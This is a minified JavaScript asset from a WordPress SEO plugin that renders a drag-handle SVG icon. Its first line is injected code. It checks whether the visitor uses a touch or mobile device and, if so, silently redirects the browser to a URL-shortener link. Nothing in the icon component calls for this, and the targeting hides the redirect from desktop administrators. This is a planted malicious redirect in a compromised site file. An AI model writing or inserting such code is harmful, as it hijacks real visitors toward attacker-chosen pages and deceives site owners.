(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as t}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as r,i as s,j as o}from"./vendor-vue-ui.232c7c36.js";const e={},c={viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",class:"aioseo-drag"};function a(l,n){return r(),s("svg",c,[...n[0]||(n[0]=[o("path",{d:"M0 0h24v24H0V0z",fill:"none"},null,-1),o("path",{d:"M11 18c0 1.1-.9 2-2 2s-2-.9-2-2 .9-2 2-2 2 .9 2 2zm-2-8c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm0-6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm6 4c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2zm0 2c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm0 6c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2z",fill:"currentColor"},null,-1)])])}const p=t(e,[["render",a]]);export{p as S};
